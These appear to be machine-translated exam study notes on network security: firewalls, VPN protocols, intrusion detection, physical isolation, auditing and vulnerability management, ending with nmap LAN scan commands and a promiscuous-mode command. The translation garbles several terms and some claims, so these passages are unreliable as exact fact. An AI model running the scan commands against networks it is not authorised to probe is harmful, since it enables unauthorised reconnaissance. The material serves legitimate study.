• Intranet (Intranet), such as a private network of a company or organization, where network access is restricted within the organization;
• Extranet (Extranet), an extended extension of the intranet, Commonly used for communication between organizations and partners;
• Military buffer zone, DMZ for short, this zone is a network segment between the internal network and the external network.
Public service equipment is often placed to provide information services to the outside world.
Firewall performance indicators mainly include the following aspects:
• Maximum throughput
. Maximum connection rate
• Maximum number of rules
• Number of concurrent connections
Three types of firewall architectures:
Dual-hosted host architecture: Dual-hosted host architecture refers to using a dual-hosted host as the main body of the firewall system, using 2 network cards, one connected to the external network and one connected to the internal network, to separate the external network. and internal network, and can perform control and filtering functions.
Proxy firewall architecture: It consists of two devices: a proxy server host and a filtering router. The proxy server not only acts as a proxy for internal and external network communications, but also connects to the egress filtering router to jointly build a secure network boundary.
Blocked subnet architecture:. It is to add a layer of peripheral network security mechanism to the proxy firewall architecture so that there are two layers of isolation zones between the internal network and the external network.
Functions of the access wall: filtering non-secure network access, restricting network access, network access auditing, network bandwidth control, collaborative defense, server load balancing, network NAT
2. What are the security risks of firewalls:
Network bypass
? Firewall strong function defects:
It does not completely prevent virus-infected software or files.
Unable to protect against driver-based data attacks.
Unable to completely prevent backdoor attacks.
Unable to protect against internal threats.
Limited by security rules.
3. The packet filtering firewall is highly efficient, cannot filter at the user level, and cannot identify anti-phishing IPs.
4. Firewall deployment method:
Divide different security zones according to business,
set access points for different security zones,
formulate access policies for different zone access
, adopt appropriate firewall technology according to the border access policy,
configure and implement the corresponding security policy,
and test whether the border policy is normal.
Operate and maintain firewalls
NAT:
There are three main ways to implement network address translation:
static NAT (StaticNAT), NAT pool (pooledNAT) and port NAT (PAT). Among them, static NAT
is the simplest to set up. Each host in the internal network is permanently mapped to a legal address in the external network. The NAT pool configures a legal address set in the external network and uses dynamic allocation to map it to the internal network. PAT maps the internal address to different ports of an IP address on the external network. Currently, many router products have NAT functions. The IPtables firewall that comes with the open source operating system Linux supports address translation technology.
In addition to integrating the packet filtering, stateful inspection, address translation and other functions of traditional firewalls, next-generation firewalls also have application identification and control, can respond to the evolution of security threats, detect hidden network activities, dynamically respond to attacks quickly, and support unified security policy deployment. New functions such as intelligent security management.
(l) Application identification and control. It does not rely on ports. Through in-depth content analysis of network data packets, it can
accurately identify application layer protocols and applications, provide application-level function control, and support application security protection.
(2) Intrusion Prevention (IPS). Ability to detect and protect against attacks based on vulnerability characteristics, such as SQL injection attacks.
(3) Data leakage prevention. Identify and filter transmitted files and content, accurately identify the true types of common files,
such as Word, Excel, PPT, PDF, etc., and filter sensitive content.
(4) Malicious code protection. Adopting Jiqian Reputation's malicious detection technology, it can identify malicious files and websites. Build
a Web reputation database, conduct threat analysis and reputation rating on Internet website resources (IP, URL, domain name, etc.), list website resources containing malicious code into the Web reputation database, and then use content filtering technology to prevent users from accessing websites with bad reputations , thereby achieving intelligent protection of end-user security.
(5) URL classification and filtering. Build a URL classification library that contains different types of URL information (such as bad remarks, online
"phishing", forum chats, etc.) to achieve accurate and efficient filtering of websites unrelated to work, bad information, and high-risk websites.
(6) Bandwidth management and QoS optimization. Through intelligent identification of business applications, we can effectively manage the bandwidth used by network users/IPs,
ensure the bandwidth of key businesses and key users, and optimize the utilization of network resources.
(7) Encrypted communication analysis.
Monitor and analyze encrypted network traffic such as SSL and SSH through technologies such as man-in-the-middle proxy and redirection .
Nine (key points), VPN
1, domestic SM1, SM4 cryptographic algorithms, and SM3 hash algorithm can all be used on VPN.
The core technology of VPN is cryptographic algorithm. VPN uses cryptographic algorithm to encrypt and transform the information that needs to be transmitted, thereby
ensuring that unauthorized users on the network cannot read the information.
Types of VPNs:
link layer VPN, network layer VPN, transport layer VPN
1. Components of VPN
• Consists of client, transmission medium (using "tunnel" technology) and server.
•A VPN server must be configured in the enterprise's intranet, one side is connected to the enterprise's internal private network, and the other side
is connected to the Internet.
The main service functions of VPN: confidentiality service, integrity service and authentication service.
2. VPN has two types of authentication access control: user identity authentication and data integrity and legality authentication.
3. AH protocol: Also called the authentication header protocol, it ensures data integrity and data source authentication, and cannot provide confidentiality services for IP data packets.
ESP protocol: It can provide authentication, encryption of data packets and all the functions of AH.
Both IP AH and IP ESP have two working modes, namely transparent mode (Transport mode) and tunnel mode (Tunnel
Mode). Transparent mode only protects the data payload in the IP packet, while tunnel mode protects the header and data field of the IP packet. Therefore, in tunnel mode, a new IP packet header will be created, and the old IP packet (referring to the IP packet that requires security processing) will be used as the new IP packet data.
The working mode of IPSec VPN products should support tunnel mode and transmission mode. Tunnel mode is applicable to thousands of hosts and gateways
, while transmission mode is an optional feature and is only applicable to thousands of hosts.
4. ipsec uses Internet exchange protocol IKE, Internet security and key management protocol ISAKMP, and key exchange protocol Qakley
The main advantage of IPSec technology is its transparency, the provision of security services does not require changes to the application. However,
the problems it brings are increasing the difficulty of network security management and reducing network transmission performance.
Transparency, also called concealment, is the basic requirement for information disguise. It uses the attributes of the human visual or auditory system and undergoes a systematic hiding process so that there is no obvious degradation of the target data.
The IKE protocol is an application layer protocol based on UDP. It is mainly used for SA negotiation, key management, and key exchange protocols. The
IKE protocol is divided into two versions: IKEv1 and IKEv2. Compared with IKEv1, IKEv2 fixes many recognized problems. Security vulnerabilities in cryptography improve security performance, while simplifying the negotiation process and improving negotiation efficiency.
The IKE protocol is a hybrid protocol that combines three protocols: ISAKMP (Internet Security Association and Key Management Protocol), Oakley protocol, and SKEME protocol. Among them, ISAKMP defines the establishment process of IKE SA. The core of Oakley and SKEME protocols is the DH (Diffie-Hellman) algorithm, which is mainly used to safely distribute keys and verify identities on the Internet to ensure the security of data transmission. The encryption keys and verification keys required by IKE SA and IPSec SA are generated through the DH algorithm, and it also supports dynamic key refresh.
The client requires the installation of L2TP software. L2TP uses a dedicated tunnel protocol that runs on UDP
port 1701.
5. The SSl protocol includes: handshake protocol, password specification change protocol, alarm protocol, and recording
protocol. The handshake protocol also includes: password specification change protocol and alarm protocol.
The handshake protocol is used for identity authentication and security parameter negotiation; the password specification change protocol is used to
notify changes in security parameters; the alarm protocol is used for closing notifications and error alarms; the record layer protocol is used for segmentation, compression and decoding of transmitted data. Compression, encryption and decryption, integrity check, etc.
In fact, the SSL protocol is located between the application layer and the transport layer. It can provide security guarantee for any application layer protocol based on reliable connections such as TCP, and provide security support for data communication.
6. SSL three secure communication services:
Point-to-point identity authentication: using asymmetric encryption
Confidentiality (using AES): encryption processing, encrypting data to prevent data from being stolen midway;
Integrity: maintaining the integrity of the data to ensure that the data is It is not changed during the transmission process;
authentication: authenticates the true identity of the server to ensure that the data is sent to the correct client and server
TLS Protocol
Transport Layer Security (TLS) is used to provide confidentiality and data integrity between two communicating applications.
The protocol consists of two layers: TLS Record and TLS Handshake.
TLS is an upgraded version of SSL. Specifically, SSL was originally a secure transmission protocol designed by Netscape and mainly used for the Web. At that time, SSL was just a standard security protocol for one company. Later, IETF, an organization dedicated to the development and promotion of Internet standards, believed that the protocol was good, so it This protocol was upgraded and standardized (RFC 2246) based on SSL3.0
, and named TLS (Transport Layer Security).
The working modes of SSL VPN products are divided into two types:
client-server mode and gateway-gateway mode.
The SSL VPN protocol provides 3 types of secure communication services:
(1) Confidential communication. Data encryption and decryption use symmetric cryptography algorithms.
(2) Point-to-point identity authentication. Use an asymmetric cryptographic algorithm.
(3) Reliable communication. Information integrity check is included during information transmission, using a key-protected message authentication code (MAC). The calculation of MAC uses a secure hash function, such as SHA and MD5.
The first phase establishment method of ipsec VPN tunnel is divided into main mode and aggressive mode. The main difference between these two modes is the negotiation method used in IKE negotiation.
The specific differences are:
1. Main mode requires three stages during IKE negotiation: SA exchange, key exchange, ID exchange and verification; aggressive mode has only two stages: SA exchange and key generation, ID exchange and verification.
2. Main mode generally uses IP address to identify the peer device; while aggressive mode can use IP address or domain name to identify the peer device.
Therefore, in comparison, the main mode is more secure, while the aggressive mode negotiates faster. Two or more devices of the VPN must be set to the same mode in order for the VPN to be successfully established.
Respective applicable scenarios:
IKE main mode: The public IP addresses applicable to both devices are fixed static IP addresses.
Aggressive mode: Applicable to situations where the public network IP is dynamic. For example, if the external network line uses ADSL dial-up, the public network IP obtained is not fixed. It is also applicable to situations where there is a NAT device, that is, the firewall is in bypass mode or bridge mode. Place it on the intranet, and when establishing a VPN with branch equipment, you need to pass through other egress equipment.
There is also an end-to-point model, which is a single-point remote remote access to the enterprise VPN for employees on business trips.
Both IP AH and IP ESP have two working modes, namely transparent mode (Transport Mode) and tunnel mode (TunnelMode). Transparent mode only protects the data domain (Data payload) of IP packets, while tunnel mode protects the headshot of IP packets. and data fields.
7. IPSEC has two modes: transmission and tunnel.
8. SSL VPN has two modes: client to server and gateway to gateway.
9. IPSEC VPN requirements:
Asymmetric cryptographic algorithm: 1024-bit RSA or 256-bit sm2 algorithm for digital signatures and digital envelopes.
Symmetric cryptographic algorithm: 128-bit block SM1 algorithm, used for key negotiation and data encryption,
cryptographic hash algorithm SM3, used for symmetric key generation and integrity verification.
10. SSL VPN:
asymmetric algorithm 256-bit SM2 elliptic curve, identification password algorithm SM9 and RSA algorithm.
Symmetric cryptography uses the SM1 algorithm
and the cryptographic hash algorithm SM3, which is used for symmetric key generation and integrity verification.
The main functions of IPSec VPN include: random number generation, key negotiation, secure message encapsulation, NAT traversal, and identity
authentication. Identity authentication data should support digital certificates or public-private key pairs, and the IP protocol version should support 1Pv4 protocol or 1Pv6 protocol.
The main functions of SSL VPN include: random number generation, key negotiation, secure message transmission, identity authentication, access control, key update, and client host security check.
Main performance indicators of ipsec: encryption and decryption throughput, encryption and decryption delay, encryption and decryption packet loss rate, number of new connections per second
SSL VPN main performance indicators: maximum number of concurrent users, maximum number of concurrent connections, number of new connections per second, throughput
11. Three types of VPN applications:
remote access virtual network: remote access to the VPN network within the company for business trips.
Enterprise internal virtual network: VPN network established by all branches.
Enterprise extended virtual network: VPN network connected by partners.
10 (Key points) Intrusion detection model CIDF: event generator, event analyzer, response unit, event database.
The purpose of intrusion detection is not to prevent attacks, but to use detection technology to discover behaviors in the system that attempt or have violated case policies.
An intrusion detection system mainly consists of the following functional modules: data collection module, intrusion analysis engine module, emergency
processing module, management configuration module and related auxiliary modules. The function of the data collection module is to provide analysis data for the intrusion analysis engine module, including operating system audit logs, application running logs, and network data packets. The function of the intrusion analysis engine module is to analyze the collected data according to a certain algorithm based on the information provided by the auxiliary module (such as attack mode), determine whether there is an intrusion behavior, and generate an intrusion alarm. This module is the core module of the intrusion detection system. The function of the management configuration module is to provide configuration services for other modules and is the interface between modules in the IDS system and users. The function of the emergency processing module is to provide emergency response services after an intrusion occurs, such as shutting down network services, interrupting network connections, starting backup systems, etc. The function of the auxiliary module is to assist the intrusion analysis engine module to work and provide it with corresponding information, such as attack signature database, vulnerability information, etc. Figure 10-5 shows a general intrusion detection system structure.
The system in the picture is a broad concept and may be a workstation, network segment, server, firewall, Web server, enterprise
network, etc. Although each IDS is conceptually the same, in specific implementation, there are differences in key aspects such as data analysis methods, data collection, and protection objects.
According to the source of IDS detection data and its security scope, IDS can be divided into three major categories:
The first category is a host-based intrusion detection system (HIDS for short), which detects intrusion behavior by analyzing host information
; The second category is a network-based intrusion detection system (NIDS for short), which discovers intrusion behavior by obtaining data packets in network communications and scanning these packets for attack characteristics or anomaly modeling; the third
category is a distributed intrusion detection system (DIDS for short) collects detection data from multiple hosts and multiple network segments, or collects alarm information from a single IDS, and conducts comprehensive analysis based on the collected information to discover intrusion behavior.
Several common misuse detection methods:
(1) Misuse detection method based on conditional probability
(2) Misuse detection method based on state transition
(3) Misuse detection method based on keyboard monitoring (alias, cannot detect malicious programs Automatic attack)
(4) Rule-based misuse detection method (Snort)
Advantages:
• Misuse detection has strong divisibility and independence, and can reduce the size of the pattern database
• It is highly targeted and can detect known The intrusion method detection efficiency is very high
• Ability to provide fuzzy intrusion detection engine
Disadvantages:
• Scalability and performance are related to the size and architecture of the pattern database
• Poor scalability
• Usually does not have self-learning ability to detect new attacks Analysis must supplement the pattern database
• Attack behavior is difficult to pattern
Pay attention to the four types of behavior detection:
① The behavior is an intrusion, but it does not behave abnormally;
② The behavior is not an intrusion, but it behaves abnormally;
③ The behavior is neither
an intrusion nor abnormal; ④ The behavior is an intrusion, and it behaves abnormally.
Classification of anomaly-based intrusion detection technology:
1. Statistics-based anomaly detection methods
2. Pattern prediction-based anomaly detection methods
3. Text classification-based anomaly detection methods
4. Bayesian inference-based anomaly detection methods
Advantages:
• Comply with data The theory of abnormal changes is suitable for the development laws of things
• The checking algorithm is relatively universal, and tracking variables does not require a large amount of memory
• It has the ability to detect and respond to some new attacks
Disadvantages:
• The data assumptions may be unreasonable, and the weighting algorithm is May be statistically inaccurate
• Easily cause misjudgment of sudden normal events
• Low sensitivity to long-term, stable attack methods
1. Specification-based
intrusion detection method (specification-based intrusion detection) is between anomaly detection and misuse
detection . Its basic principle is to use a policy description language PE-grammars to define system privileges in advance. The program is concerned with the safe operation execution sequence. Each privileged program has a set of safe operation sequences. These operation sequences constitute the security tracing policy (trace policy) of the privileged program. If the operation sequence of the privileged program does not comply with the defined operation sequence, an intrusion alarm will be issued. The advantage of this approach is that not only known attacks can be discovered, but also unknown attacks.
Intrusion detection system classification:
host-based intrusion detection system (HIDS),
network-based intrusion detection system (NIDS),
distributed intrusion detection system (DIDS).
Distributed intrusion detection systems can be divided into two types, namely host-based distributed intrusion detection systems and network-based distributed intrusion detection systems.
HIDS collects information such as log files, system calls, application usage, system resources, network communications, and user usage of the host system, analyzes whether this information contains attack characteristics or anomalies, and uses this to determine whether the host has been invaded. Intrusion behavior will cause changes in the host system.
Can detect attacks that network-based intrusion detection systems cannot detect;
host-based intrusion detection systems can run on networks that apply encryption systems, as long as the encrypted information is decrypted when or before arriving at the host monitored by the building;
host-based intrusion detection system, referred to as HIDS. HIDS collects
information such as log files, system calls, application usage, system resources, network communications, and user usage of the host system, analyzes whether this information contains attack characteristics or abnormalities, and uses this to determine whether the host has been invaded.
HIDS is generally suitable for detecting the following intrusion behaviors:
• Port or vulnerability scanning of the host; • Repeated failed login attempts; •
Remote password cracking;
• Adding user accounts to the host system;
• Service startup or stop;
• System restart;
• File integrity or permission changes;
• Registry modifications;
• Changes to important system startup files;
• Abnormal program calls;
• Denial of service attacks.
NIDS listens to the network system, captures network data packets, and identifies intrusion behavior based on whether the network packets contain attack characteristics or whether the network communication flow is abnormal. It is mostly divided into two parts: detector and management controller.
NIDS usually consists of a set of single-purpose computers, which are divided into two parts: detectors and management controllers.
Intrusion behaviors that NIDS can detect:
synchronization storm (SYN Flood);
distributed denial of service attack (DDoS);
network scanning;
buffer overflow;
protocol attack:
abnormal traffic:
illegal network access.
The distributed intrusion detection system based on thousands of host detection, referred to as HDIDS, is divided into two parts: host detector
and intrusion management controller. HDIDS configures and manages host detectors hierarchically and by area, integrating them into a system that can monitor and protect hosts distributed in network areas. HDIDS is used to protect key servers on the network or other systems with sensitive information. It uses the host's system resources, system calls, audit logs and other information to determine whether the host system is running in compliance with security rules. In the actual work process, host detectors are mostly installed directly on each protected host system in the form of a security agent, and are remotely controlled through the system management console in the network. This centralized control method makes it easy to monitor and manage the status of the system and update the software of the detection module.
The structure of NDIDS is divided into two parts: network detector and management controller. Network detectors are deployed in important network areas, such as the network segment where the server is located, and are used to collect network communication data and business data flows. The collected information is analyzed by using two methods: abnormality and misuse. If an attack or abnormality occurs, According to the network behavior, alarm information is sent to the management controller.
DIDS is generally suitable for large-scale networks or geographically dispersed networks. Using this structure is beneficial to realizing distributed security management of the network. Network intrusion systems currently on the market generally support distributed structures.
Intrusion detection related indicators:
reliability, availability, scalability, timeliness, accuracy, and security.
Intrusion detection application scenario types:
1. Internet protection
2. Website intrusion detection and protection
3. Network attack blocking
4. Host terminal malicious code detection
5. Network security monitoring, early warning and emergency response
6. Network security level protection
Traffic detection can realize:
intrusion detection,
user traffic accounting, load
balancing monitoring,
protocol debugging,
service quality monitoring,
network optimization,
performance analysis,
network error correction
Passive attack:
only steals, sniffs, and analyzes data without affecting the normal operation of the network and services.
The principle of XMAS scanning is similar to that of NULL scanning. The ACK, FIN, RST, SYN, URG, and PSH flags in the TCP packet are set to 1 and then sent to the target host. The target host will not return any information if the target port is open.
2. Intrusion detection system classification:
Host-based: analyzes system logs, applications and system calls, suitable for stand-alone hosts.
Intrusion detection technology
Anomaly detection: relies on behavioral signature library
Misuse detection: relies on attack pattern library
Misuse of intrusion detection is often called signature-based intrusion detection method, which refers to detecting intrusion behavior based on known intrusion patterns
. Attackers often exploit vulnerability technologies in systems and application software to carry out attacks, and these vulnerability-based attack methods have certain characteristic patterns. If the intruder's attack method happens to match the characteristic pattern in the detection system, the intrusion behavior will be detected immediately, as shown in Figure 10-3.
The prerequisite for misuse of intrusion detection is that the intrusion behavior can be characterized in some way, and the process of intrusion detection is actually a pattern matching process.
Anomaly-based intrusion detection technology
The anomaly detection method refers to establishing a "trajectory" of the normal behavior of the system through statistical analysis of computer or network resources,
defining a set of values for the system's normal conditions, and then comparing the system running values with the defined "normal "Compare the situation
to determine whether there are signs of being attacked, as shown in the figure below.
Network-based: SYN Flood; distributed denial-of-service attack (DDoS); network scanning; buffer overflow; protocol attack;; traffic anomaly; illegal network access.
Distributed-based: divided into two parts, a network detector and a network manager, to comprehensively analyze intrusion behavior from multiple hosts and multiple networks. Mainly used in large network architectures.
3. The intrusion detection system module consists of: data collection module, intrusion analysis module (core module), emergency processing module (emergency network disconnection, startup backup), management configuration module (providing configuration services for other modules), auxiliary module (assist analysis engine Work).
Main penetration attacks: impersonation, bypass, authorized infringement.
4. Intrusion detection IDS deployment steps:
The first step is to determine the objects or protected network segments to be monitored by IDS according to the security policy requirements;
the second step is to install IDS detectors on the monitored objects or protected network segments to collect network intrusion detection data. The required information;
the third step, formulate the corresponding detection strategy based on the security requirements of the monitored object or protected network segment; the
fourth step, select the appropriate IDS structure type
based on the detection strategy; the fifth step, configure the intrusion on the IDS Detection rules;
the sixth step, test and verify whether the security policy of IDS is executed normally;
the seventh step, run and maintain IDS.
5. Snort is a commonly used open source network intrusion detection system. Its basic technical principle is to obtain network data packets, then perform intrusion detection based on security rules, and finally form alarm information.
Snort rules consist of two parts, namely rule header and rule options.
Snort open source intrusion detection includes three modules: sniffing, network intrusion detection, and packet recording.
Snort is a commonly used network intrusion detection system. Its basic technical principle is to obtain network data packets, then
perform intrusion detection based on security rules, and finally form alarm information. Snort rules consist of two parts, rule header and rule options. The rule header contains rule operation (action), protocol (protocol), source address and destination IP address, network mask, source address and destination port number information. Rule options include alarm messages, part of the information of the inspected network packets, and the actions that the rules should take. Snort rules are as follows:
Rule headers and rule options are distinguished by "()", and the content of rule options is enclosed in parentheses. Common actions in rule headers
include alert, log, pass, activate, and dynamic; rule options are the core of Snort intrusion detection engine. All Snort rule options are separated by semicolons. Rule option keywords are distinguished by colons and corresponding parameters. Snort Provides fifteen rule option keywords. Commonly used rule option keywords are msg and content. msg is used to display alarm information, and content is used to specify the content of matching network packets.
ifconfig eth0 promisc network card turns on promiscuous mode
11. Physical isolation
1. The government intranet and the government extranet should be physically isolated, and the government extranet and the Internet should be logically isolated.
2. Indicators of network and terminal isolation products:
security function indicators, security performance indicators, and security assurance indicators.
3. Requirements for each product
Terminal isolation products: access control, non-bypassable, and object reuse.
Network isolation products: access control, attack resistance, auditing, data integrity, password support.
One-way network import: access control, attack resistance, auditing, data integrity, and data import status monitoring.
In March 2015, Israeli researchers designed a secret-stealing technology called Bitwhisper, which establishes a covert channel between the attacker and the target system to steal data by detecting the heat generated by the device. The basic principle is to use the temperature rise and fall of the controlled equipment of the sender's computer to communicate with the receiver system, and then the latter uses the built-in thermal sensor to detect the temperature change, and then translates this change into a binary code, thereby achieving two communication between isolated computers.
4. Technical principles of physical isolation:
Avoid direct exchange of information and physical connection between two computers, and block network attacks between two computers.
According to the objects of isolation, network physical isolation systems can generally be divided into single-point isolation systems and regional isolation systems. Among them,
the single-point isolation system mainly protects individual computer systems and prevents direct external attacks and interference. The regional isolation system is targeted at the network environment to prevent external attacks and internally protect the network.
According to the information transmission direction of network physical isolation, network physical isolation systems can be divided into two-way network physical isolation systems and one-
way network physical isolation systems.
Networks that adopt network physical isolation security protection measures still face the following risks:
•Illegal network external connections
•U disk ferry attacks
•Security risks of network physical isolation products
•New attack methods targeting physical isolation
1. The implementation technology of the physical isolation mechanism mainly includes
• dedicated computer Internet access
• multiple PCs
• external network proxy service
• internal and external network line switcher
• single hard disk internal and external partitions
• dual hard disks
• gatekeeper
• protocol isolation technology
• one-way transmission components
• information Ferry technology
·Physical disconnection technology
Physical disconnection means that networks in different security domains cannot be connected directly or indirectly. In a physical network
environment, physical disconnection of networks in different security domains should technically ensure the disconnection of information in physical transmission and physical storage. Physical disconnection is usually accomplished by an electronic switch.
Terminal isolation products are used to connect two different security domains at the same time. They use physical disconnection technology to achieve
physical isolation of security domains on the terminal through security isolation cards or security isolation computers.
Terminal isolation products generally connect to the target host in the form of isolation cards. The isolation card simultaneously
connects the hard disk connected to security domain A, the hard disk connected to security domain A or security domain B, and security domain B through an electronic switch in a mutually exclusive manner, thereby achieving
physical isolation of the two security domains inside and outside. This type of product can also integrate the isolation card into the host and use it as a complete machine.
The network one-way import product is located between two different security domains. It constructs the only channel for one-way transmission of information through physical means (can be based on electrical signal transmission or optical
signal transmission), realizes one-way import of information, and ensures that only security policies Information that is allowed to be transmitted can pass through, while no information is transmitted or fed back in the opposite direction.
Network isolation products connect two different security domains to implement
functions such as application proxy services, protocol conversion, information flow access control, content filtering, and information ferrying between the two security domains. The technical principle of the product adopts a "2+1" architecture,
which is composed of two hosts + dedicated isolation components. It uses protocol isolation technology and information ferry technology to achieve security domain security isolation and information exchange on the network. Among them, the special isolation components generally use isolation switching boards composed of special isolation chips that contain electronic switches and solidified information ferry control logic, or are security-enhanced hosts running special information transmission logic control programs.
The gatekeeper uses a GAP technology (derived from the English Air Gap) to enable secure data exchange and sharing between two or more networks without being connected. The technical principle is to use a switch with a control function to read and write storage security equipment, and connect or cut off the data exchange between two independent host systems through the setting of the switch.
A gatekeeper is required to connect classified and non-confidential networks, a single gatekeeper is used to connect a non-confidential network to the Internet, and a two-way gatekeeper is used when a non-confidential network is not connected to the Internet.
The gatekeeper agent can be regarded as data disassembly, which removes the header and trailer of the application protocol, retains only the data part, and transmits only the net data between the wind and external networks.
The connections between two independent host systems and the gatekeeper are mutually exclusive. Therefore, there is no physical connection for communication between the two independent hosts,
and the host's operations on the gatekeeper are only "read" and "write". Therefore, the gatekeeper physically isolates and blocks direct
attacks between hosts, thus reducing the possibility of online attacks to a great extent. However, gatekeepers still present security risks. For example, intruders can use malicious data-driven attacks to hide malicious code in electronic documents, send them to the target network, and trigger them through electronic documents with malicious code functions, constituting internal attacks. Network security threats.
12. Network security audit generally includes: information acquisition, information storage, information analysis, information display and utilization, and system management.
The audit system includes three major functional modules: audit event collection and filtering, audit event recording and query, audit analysis and response to alarms
Common network audit data security analysis technologies include string matching, full-text search, data association, statistical reports,
visual analysis, etc.
Network security audit mechanisms mainly include host-based audit mechanisms, network communication audit mechanisms, application-based audit
mechanisms, etc.
A common system log data collection technology is to
aggregate event information generated in operating systems, databases, network devices and other systems into a unified server storage for query, analysis and management.
There are two types of network audit data storage technologies:
one is that the system itself generates decentralized storage of audit data, and the audit data is stored in different systems; currently, operating systems, databases, application systems, network devices, etc. can all store logs separately. data.
Another method is to centrally collect audit data from various systems, establish an audit data storage server, and store it in a dedicated storage device to facilitate subsequent query analysis and electronic evidence collection.
Operating systems, databases and other systems set three types of users: operators, security officers and auditors.
The operator is only responsible for the operation and maintenance of the system, and the operation process is recorded in detail by the system; the
security officer is responsible for the configuration and maintenance of the system security policy;
the auditor is responsible for maintaining audit-related matters, and can view the work process logs of the operator and security officer; Operators cannot modify their own operation records, and auditors cannot operate the system.
Concept of network security audit:
• Network security audit refers to the work of obtaining, recording, storing,
analyzing and utilizing information on security-related activities of network information systems.
Log security audit: log collection, log storage, log analysis, log query, event warning, statistical report, system management.
Log analysis technology is widely used in computer crime investigation and electronic evidence collection. Many cases use log analysis technology to provide clues
and obtain evidence.
2. Classification by audit objects: operating system security audit, database security audit, network communication security audit, application system security audit, network security equipment audit, industrial control security audit, mobile security audit, Internet security audit, code security audit.
3. Linux audit: system boot.log
acct/pacct command operation log, last login log lastlog, loginlog bad login record, sulog using su command log, utmp current user login log, wtmp user login and exit log, messages system Messages, btmp records users who failed to log in, xferkig records ftp access logs, woldlog records external media error information, and acct/pacct records each user's usage log.
Syslog is the default log daemon in Linux systems. It can record local events or events on another host through the fp network.
4. Data inventory audit method:
Network monitoring audit: In-depth analysis of database network traffic and data packets to achieve access and control of the database. Encrypted data and local operation databases cannot be audited.
Built-in auditing: The auditing system that comes with the database system has a certain impact on the performance of the database and can be easily deleted.
Database agent: Install an agent on the database, and use the agent to collect information for auditing, which has an impact on the performance and stability of the database.
5. GB17859 (Computer information security level protection classification criteria)
6. Network security audit mechanism types:
host-based, network communication-based, application-based.
China's national standard GB17859 "Guidelines for the Classification of Security Protection Levels of Computer Information Systems" (hereinafter referred to as the "Guidelines
") requires the provision of audit security mechanisms starting from level two. The Standards clarify the requirements for auditing at each level, as
shown in the table below.
Thirteen (Key Points): Network security loopholes are also called vulnerabilities.
Fuzz testing is a black box test that can discover software vulnerabilities without source code. It is an automated dynamic vulnerability mining technology that does not cause false positives and does not require a large amount of manual reverse analysis.
Security vulnerability analysis and vulnerability management are basic tasks of network security. The American MITER company developed
Common Vulnerabilities and Exposures (CVE) to unify and standardize vulnerability naming. MITER has also established a Common Weakness Enumeration (CWE) to standardize and describe security vulnerabilities in software architecture, design, and coding. For the hazard assessment of security vulnerabilities, the Forum of Incident Response and Security Organizations (FIRST) developed and released the Common Vulnerability Scoring System (CVSS). CVSS uses a ten-point scale to score and evaluate the severity of security vulnerabilities. The higher the score, the more harmful the vulnerability is.
CVSS is a universal vulnerability scoring system. The score calculation basis is composed of basic metric scoring, timing metric scoring, and environmental
metric scoring. Taking CVSS v3.0 as an example, the basic metric score is determined by attack vector, attack complexity, privilege requirements, user interaction, integrity impact, confidentiality impact, availability impact, impact scope and other parameters. The timing metric score is determined by parameters such as vulnerability exploit code maturity, patch level, and vulnerability report credibility. Environmental metric scores are determined by integrity requirements, confidentiality requirements, availability requirements, revision base scores, etc.
CVE is a dictionary of security vulnerabilities built and maintained by the American company MITER.
CVE provides a unified identification and standardized description of disclosed security vulnerabilities , and its goal is to facilitate the sharing of vulnerability data. A CVE entry contains an identification number, a brief description of the security vulnerability, and at least one public reference. The identification number is referred to as CVE ID, and its format consists of a year number and other numbers. For example, CVE-2019-1543 is an Open SSL security vulnerability number.
National Information Security Vulnerability Database CNNVD, National Information Security Vulnerability Sharing Platform CNVD
CNVD divides vulnerabilities into 11 types according to the causes of vulnerability
CNNVD has played a major role in the collection of information security vulnerabilities, notification of major vulnerability information, and
security elimination and control of high-risk vulnerabilities. , providing important technical support and data support for the safety and security of important national industries and critical infrastructure.
The CERT (Computer Emergency Response Team) organization was established in 1988. It is the world's first computer security emergency response organization. Its main task is to provide response and processing of intrusion incidents. Currently, the organization also releases vulnerability information.
The National Information Security Vulnerability Sharing Platform (CNVD) is an information security vulnerability information sharing knowledge base established by the National Computer Network Emergency Response Technology Coordination Center in conjunction with important
domestic information system units, basic telecommunications operators, network security vendors, software vendors and Internet companies. .
There are four main sources of vulnerability information at home and abroad:
first, network security emergency response agencies;
second, network security manufacturers;
third, IT product or system providers;
fourth, network security organizations.
Host vulnerability scanners include COPS, Tiger, Microsoft Baseline Security Analyser (MBSA), etc.
Among them, COPS (ComputerOracle and Password System) is used to check common security configuration issues and system defects of UNIX systems. Tiger is a vulnerability detection program based on shell language script, used for configuration vulnerability inspection of UNIX systems. MBSA is a security baseline analysis tool for Windows systems.
Windows certificate management runs to open: certmgr.msc
1. Vulnerability patches can be divided into:
Zero-day vulnerabilities: newly discovered vulnerabilities for which no vulnerability patch has been released.
Common vulnerabilities: Vulnerability patches have been released and can be repaired.
Vulnerability Overview
Vulnerabilities are generally defects that cause network information system security policies to conflict. Such defects are often called security risks. The main impacts of security vulnerabilities include loss of confidentiality, integrity damage, reduced availability, lack of resistance, reduced controllability, and loss of authenticity.
Foreign network security agencies have announced two types of CPU vulnerabilities, Meltdown and Specter
, triggering a global network security crisis. The vulnerability allows a program to steal data being processed on the computer. Security vulnerabilities at other levels have also been discovered.
Network security vulnerability management process:
asset confirmation,
vulnerability information collection,
vulnerability assessment
, vulnerability elimination and control,
vulnerability change tracking
Vulnerability discovery methods: manual security analysis, tool automated detection, artificial intelligence-assisted analysis
Vulnerability discovery technology: text search, lexical analysis, range checking, state machine checking, error injection, fuzz testing, dynamic taint analysis, formal verification
2. Internet worms: sendmail and finger vulnerabilities.
Distributed denial-of-service attack: TCP/IP vulnerability.
Code Red worm: iis4.0/5.0 index service security vulnerability
Slammer worm: mssql database system vulnerability
Shockwave worm: dcomprc buffer vulnerability
Stuxnet virus: windows wincc system vulnerability
WannaCry ransomware: windows smb vulnerability
3. Vulnerability classification standard:
global: cve vulnerability classification
cvss vulnerability scoring system, which scores and grades according to different severity levels.
China's owasp top 10 vulnerability classification
China's information security vulnerability library cnnvd
China's information security vulnerability sharing platform cnvd
4. There are three types of vulnerability scanners:
host vulnerability scanners: oops, tiger, and MBSA.
Network vulnerability scanners: nessus, nmap.
Dedicated vulnerability scanner: web, data server, industrial control.
Commonly used scanning software is divided into:
address scanner, port scanner, vulnerability scanner.
There are four types of harmful behaviors
: (1) Information leakage attack;
(2) Integrity destruction attack;
(3) Denial of service attack;
(4) Illegal use attack.
nmap without -p means all ports of all hosts:
nmap -sS 192.168.1.0/24 /Semi-connected TCP scans the LAN
nmap -sT 192.168.1.0/24 /Full-connected TCP scans the LAN
